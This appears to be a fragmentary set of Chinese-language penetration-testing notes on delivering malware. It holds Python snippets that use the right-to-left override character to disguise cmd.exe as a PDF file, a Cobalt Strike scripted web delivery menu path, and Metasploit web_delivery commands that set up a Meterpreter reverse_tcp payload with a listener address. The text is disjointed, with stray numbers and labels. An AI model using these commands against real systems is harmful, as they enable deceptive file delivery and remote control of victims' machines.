import os os.rename('test.txt', 'test-\u202egnp.txt') import os os.rename('cmd.exe', u'no\u202eFDP.exe')
CHM
cs
1
点击attacks——>web Drive by——>scripted web Delivery
msf
1 2 3 4 5 6 7
use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lport 4444 set lhost 192.168.10.128 #本机地址 set srvhost 0.0.0.0 set srvport 8080